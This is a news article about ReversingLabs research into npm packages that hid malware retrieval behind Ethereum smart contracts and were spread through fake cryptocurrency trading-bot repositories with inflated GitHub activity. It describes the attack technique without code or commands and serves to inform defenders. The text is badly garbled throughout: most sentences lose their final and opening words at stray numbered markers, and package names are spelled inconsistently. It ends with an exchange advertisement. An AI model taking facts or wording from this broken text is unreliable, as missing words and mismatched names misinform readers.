Hackers load Ethereum smart contracts with hidden malware

ReversingLabs research uncovered a malware campaign that used Ethereum smart contracts to conceal malicious software ￰0￱ findings revealed that the hackers used the npm packages colortoolv2 and mimelib2, which acted as ￰1￱ the npm packages have been installed, they fetch second-stage malware from a command and control infrastructure (C2) by querying Ethereum smart ￰2￱ researcher Lucija Valentic described the attack as creative, noting that it has not been seen ￰3￱ attackers’ approach bypassed traditional scans that typically flag suspicious URLs inside package ￰4￱ actors hide malware in plain sight Ethereum smart contracts are public programs that automate blockchain ￰5￱ this case, they enabled hackers to hide malicious code in plain ￰6￱ malicious payloads were hidden with a simple ￰7￱ file, which, when executed, reached out to the blockchain to retrieve the command and control (C2) server ￰8￱ to ReversingLabs’ research , downloader packages are not standard on npm, and blockchain hosting marked a new stage in evasion ￰9￱ discovery prompted researchers to scan widely across GitHub, where they discovered that the npm packages were embedded beneath repositories posing as cryptocurrency ￰10￱ bots were disguised as Solana-trading-bot-v2, Hyperliquid-trading-bot-v2, and many ￰11￱ repositories were disguised as professional tools, attracting multiple commits, containers, and stars, but in reality, they were just ￰12￱ to the research, accounts that performed commits or forked the repositories were created in July and did not show any coding ￰13￱ of the accounts had a README file embedded in their ￰14￱ was uncovered that the commit counts were artificially generated via an automated process to inflate coding ￰15￱ instance, most commits logged were just license file changes rather than meaningful updates.

Pasttimerles, a handle used by one maintainer, was notably used to share many commits. Slunfuedrac, another handle, was tied to the inclusion of the malicious npm packages into the project ￰16￱ detected, the hackers kept switching dependencies to different ￰17￱ colortoosv2 was detected, they switched to mimelibv2 and subsequently towards mw3ha31q and cnaovalles, which contributed to the commit inflation and placement of malicious dependencies, respectively. ReversingLabs’ research linked the activity to Stargazer’s Ghost Network, a coordinated system of accounts that boosts the credibility of malicious ￰18￱ attack targeted developers who seek open-source cryptocurrency tools and might mistake inflated GitHub statistics for legitimate ￰19￱ blockchain malware embedding marks a new phase in threat detection The uncovered attack follows a series of attacks targeting the blockchain ￰20￱ March 2025, ResearchLabs uncovered other malicious npm packages that patched legitimate Ethers packages with code that enabled reverse shells.

Ether-provider2 and ethers-providerZ npm packages containing malicious code that enabled reverse shells were ￰21￱ earlier cases, including the compromise of PyPI’s ultralytics package in December 2024, were also revealed for delivering cryptocurrency mining ￰22￱ incidents included trusted platforms like Google Drive and GitHub Gist being used to mask malicious code via C2 ￰23￱ to the research, 23 crypto-related supply chain incidents were recorded in 2024, ranging from malware to credentials ￰24￱ latest discovery employs old tricks but introduces the Ethereum contracts approach as a new mechanism. Valentic, the Research Labs researcher, said the discovery highlights the fast evolution of detection evasion strategies by malicious actors trolling open-source projects and ￰25￱ research highlighted the importance of verifying open-source libraries’ legitimacy before ￰26￱ warned that developers must assess each library they are considering before including it in their development ￰27￱ added that it was clear that indicators such as stars, commits, and the number of maintainers can be easily ￰28￱ identified npm packages, colortoolsv2 and mimelib2, have since been removed from npm and the associated GitHub accounts closed, but the activity has shed light on how the software threat ecosystem is ￰29￱ up to $30,050 in trading rewards when you join Bybit today